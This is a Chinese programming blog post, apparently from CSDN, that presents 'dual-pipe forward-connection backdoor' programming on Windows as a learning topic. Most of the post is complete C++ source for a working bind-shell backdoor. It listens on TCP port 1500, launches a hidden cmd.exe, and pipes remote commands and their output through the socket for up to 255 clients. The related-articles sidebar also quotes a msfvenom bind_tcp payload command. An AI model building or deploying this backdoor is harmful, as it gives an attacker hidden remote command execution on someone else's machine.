安全之路 —— 双管道正向连接型后门解析

最新推荐文章于 2024-03-11 21:43:05 发布
最新推荐文章于 2024-03-11 21:43:05 发布
阅读量1k 收藏 3
点赞数
分类专栏: c/c++ Windows编程 文章标签: C++ 后门编程 匿名管道 黑客编程 Windows编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/PeterZ1997/article/details/79337116
版权

##简述

后门程序有两个重要的过程,分别是socket与cmd通信的过程和cmd结果回传给socket的过程。而双管道正向连接型后门是后门中最古老的一种,采用两个匿名管道,分别负责上述两个重要过程。其中正向连接的意思是后门充当Server端,然后用户使用**telnet或netcat(nc)**充当客户端连接工具,主动连接后门,这种连接方式具有被防火墙拦截的危险,所以一般不用于现代后门,但却是后门编程学习的必经之路。

  • 双管道图例
    双管道连接图例

##C++代码样例

/*
*@Author: PeterZ
*@Time: 2018/2/19
*@Function: 双管道正向连接后门(Default_Port: 1500)
*/

#include <iostream>
#include <cstdio>
#include <cstdlib>
#include <Windows.h>
#include <winsock.h>
#pragma comment(lib, "ws2_32.lib")

using namespace std;

#define MAX_CONNECT_NUM 255 //最大连接数

SOCKET g_sListen;
SOCKET g_sClient[MAX_CONNECT_NUM];
HANDLE g_hReadPipe, g_hWritePipe, g_hWriteFile, g_hReadFile;

DWORD WINAPI ThreadInputPipe(LPVOID lpParam) //从socket到cmd之间的数据管道
{
	SOCKET sTemp = (SOCKET)lpParam;
	SECURITY_ATTRIBUTES sa;
	DWORD dwByteToWrite, dwByteWritten;
	char recv_data[1024] = "\0";
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.bInheritHandle = TRUE;
	sa.lpSecurityDescriptor = NULL;
	CreatePipe(&g_hReadPipe, &g_hWriteFile, &sa, 0);
	Sleep(300);
	while (true)
	{
		dwByteToWrite = recv(sTemp, recv_data, 2048, 0); //建立管道
		if (dwByteToWrite != SOCKET_ERROR)
		{
			WriteFile(g_hWriteFile, recv_data, dwByteToWrite, &dwByteWritten, NULL); //向管道中写数据
			Sleep(100);
		}
	}
	return 0;
}

DWORD WINAPI ThreadOutputPipe(LPVOID lpParam)   //从cmd到socket之间的数据管道
{
	SOCKET sTemp = (SOCKET)lpParam;
	SECURITY_ATTRIBUTES sa;
	char send_buf[2048] = "\0";
	DWORD len = 0, dwTotalAvail = 0;
	sa.nLength = sizeof(SECURITY_ATTRIBUTES);
	sa.bInheritHandle = TRUE;
	sa.lpSecurityDescriptor = NULL;
	CreatePipe(&g_hReadFile, &g_hWritePipe, &sa, 0);  //建立管道
	Sleep(300);
	while (true)
	{
		while (PeekNamedPipe(g_hReadFile, NULL, 0, NULL, &dwTotalAvail, NULL))
		{
			ReadFile(g_hReadFile, send_buf, 2048, &len, NULL); //从管道中读数据
			Sleep(100);
			send(sTemp, send_buf, len, 0);
		}
	}
	return 0;
}

DWORD WINAPI ThreadConnWork(LPVOID lpParam)  //多用户连接处理线程
{
	SOCKET sTemp = (SOCKET)lpParam;
	HANDLE hThread[2];
	DWORD dwThreadId1, dwThreadId2;
	PROCESS_INFORMATION pi;
	STARTUPINFO si;
	hThread[0] = CreateThread(NULL, 0, ThreadInputPipe, LPVOID(sTemp), 0, &dwThreadId1); //管道1线程建立
	hThread[1] = CreateThread(NULL, 0, ThreadOutputPipe, LPVOID(sTemp), 0, &dwThreadId2); //管道2线程建立
	Sleep(200);
	GetStartupInfo(&si);
	si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.hStdInput = g_hReadPipe;
	si.hStdOutput = g_hWritePipe;
	si.hStdError = g_hWritePipe;
	si.wShowWindow = SW_HIDE;
	char cmdline[255] = "\0";
	GetSystemDirectory(cmdline, sizeof(cmdline));
	strcat_s(cmdline, "\\cmd.exe");
	if (!CreateProcess(cmdline, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) return 0;
	WaitForMultipleObjects(2, hThread, TRUE, INFINITE);
	return 0;
}

int WINAPI WinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPSTR lpCmdLine, _In_ int nShowCmd) //主函数
{
	const char *wMessage = "===================> Hello, Welcome to Server <====================\n===================> Prepare For the CMD: <====================\n";
	unsigned int conn_count = 0;
	HANDLE connThread[255];
	DWORD dwThreadConnId[255];
	BYTE btSocMajorVer = 2, btSocMinorVer = 2;
	WSADATA wsaData;
	if (WSAStartup(MAKEWORD(btSocMajorVer, btSocMinorVer), &wsaData)) return 0;
	g_sListen = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (g_sListen == INVALID_SOCKET) return 0;
	sockaddr_in sin;
	sin.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(1500);
	if (bind(g_sListen, (LPSOCKADDR)&sin, sizeof(SOCKADDR)) == SOCKET_ERROR) return 0;
	if (listen(g_sListen, 5) == SOCKET_ERROR) return 0;
	sockaddr_in csin;
	int len = sizeof(SOCKADDR);
	for (conn_count = 0; conn_count < MAX_CONNECT_NUM; conn_count++) //多用户连接线程处理
	{
		g_sClient[conn_count] = accept(g_sListen, (LPSOCKADDR)&csin, &len);
		connThread[conn_count] = CreateThread(NULL, 0, ThreadConnWork, LPVOID(g_sClient[conn_count]), 0, &dwThreadConnId[conn_count]);
		send(g_sClient[conn_count], wMessage, strlen(wMessage), 0);
	}
	WaitForMultipleObjects(conn_count, connThread, true, INFINITE);
	for (unsigned int i = 0; i < conn_count; i++)
	{
		closesocket(g_sClient[i]);
	}
	closesocket(g_sListen);
	CloseHandle(g_hReadFile);
	CloseHandle(g_hReadPipe);
	CloseHandle(g_hWriteFile);
	CloseHandle(g_hWritePipe);
	WSACleanup();
	return 0;
}
雨者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
管道后门源代码,用telnet进行攻击
02-24
之前传了一个压缩包,居然有密码,而且我自己都解不开,重新传一个,就不收分了
简单的cmd双管道后门
qq_42124567的博客
05-16 945
这几天学习了一下windows后门编程,并尝试着写了一个简单的cmd双管道后门。主要涉及到了socket通信和管道后门分为主动连接和反向连接,区别就是一个是后门程序作为服务端,另一个是后门程序作为客户端。 双管道的原因:cmd执行结果写入管道1写句柄,后门管道1读句柄读取cmd执行结果,后门接受到的命令通过管道2的写句柄写入,cmd通过管道2的读句柄读出。 多的不说,直接上代码,我觉得注...
内网:连接与反向连接
最新发布
尘玥的故事
03-11 511
反向连接是控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用连接来控制受害主机。连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有。由于连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。
匿名管道及双管道后门后门技术
06-25
匿名管道及双管道后门后门技术匿名管道及双管道后门后门技术
使用Msfvenom生成Ubuntu 64位木马(反向连接连接
zhang35的博客
04-20 9840
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
(转)python连接后门
weixin_30828379的博客
07-03 174
python连接后门 PHITHON 2014 四月 12 00:12 阅读:16670 Python python,cmd后门,socket python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.S...
C/C++ 实现向CMDShell
CSDN
06-11 6321
该段代码是一个用于Windows平台的简单反向Shell程序。它使用Winsock库实现网络通信,创建一个监听套接字并等待控制端的连接请求。一旦控制端连接成功,程序会在被控制端启动一个新的进程,并将标准输入、输出、错误流重定向到网络套接字,以实现远程命令执行和输出回传。下载地址:https://eternallybored.org/misc/netcat/连接时使用nc工具链接即可。
msf之向shell的使用
shy的博客
09-28 8250
场景:经常使用msf生成后门文件获取shell,但是经常使用的都是反弹shell,reverse_tcp。突然之间遇到了一个场景,由于目标服务器不能出网,只能使用向shell,这时才发现,自己对于向shell,一无所知。 1,生成向shell后门文件 msfvenom -p windows/meterpreter/bind_tcp -f exe -o shy.exe 2,上传到目标机器上 3.配置监听(很重要) 4,运行目标机上的后门文件,获取shell 1,2是向sh.
msfvenom生成后门程序及利用
yy
04-08 7089
msfvenom
MSF生成后门木马
一醉一休的博客
11-19 2120
为了方便平时使用,记录一下操作命令
简单双管道后门实现
aimarpp的专栏
11-03 1856
简单双管道后门,为shellcode后门打基础
shell之解析脚本的实现方法
09-14
主要介绍了shell之解析脚本的实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
django反向解析解析的方式
09-20
主要介绍了django反向解析解析的方式,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
2-Windows中的DNS服务——解析&反向解析配置.docx
06-14
Windows中的DNS服务——解析&反向解析配置 • windows server 2008 /dns服务器 /域名 /网络 坚信并为之坚持是一切希望的原因。 -----------------------------------------------------------------------------...
Linear推出双36V低损耗电源通控制器驱动大PFET
12-06
Linear推出坚固的双“理想二极管”电源通(PowerPathTM)控制器 LTC4416 和 LTC4416-1,用于在电源切换电中驱动小和大栅电容 P 沟道 MOSFET。该器件的控制电允许两个电源协同运作, 从而确保了...
DNS解析与反向解析服务器配置
08-30
DNS解析与反向解析服务器配置
C++扫雷小游戏(基于CMD命令行)
热门推荐
雨者
11-10 2万+
这个小游戏是笔者在大一C语言课程设计的时候写的,基于命令行,为了显得漂亮一些,特别加上了彩色特效~~~ 注意:Win10系统须将命令行调为旧版命令行,否则有可能会显示乱码! 代码示例: #include <stdio.h> #include <conio.h> #include <stdlib.h> #include <ti...
通过C/C++基于http下载文件
雨者
04-20 7335
简介 Windows系统如何通过C/C++下载互联网上的文件呢?这里笔者给大家演示一个最简单的方法,利用Windows提供的urlmon库,可以快速实现文件下载的简单实例。 注:本文参考《非安全》编辑部出版的《Hack编程实例精讲》系列书籍,在此致谢。 C++代码样例 #include &lt;cstdio&gt; #include &lt;iostream&gt; #i...
C/C++控制Windows关机/注销/重启的确姿势
雨者
04-13 5767
简介 说到代码控制Windows关机/注销/重启的方式,有很多种,最简单的不过就是控制命令行,使用system(“pause”)函数执行一个shutdown -s -t 0,关机就完成了。但这种方式还要借助于命令行的方式解决问题。而Windows早就提供给我们直接控制关机/注销/重启的API了,在WindwosNT系统之前,只需调用ExitWindowsEx()就OK了。但自从出现了Win...
dns解析脚本
05-30
以下是一个简单的Python脚本,可以用来进行DNS解析: ```python import socket def dns_lookup(domain): try: ip_address = socket.gethostbyname(domain) print("The IP address of {} is {}".format...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值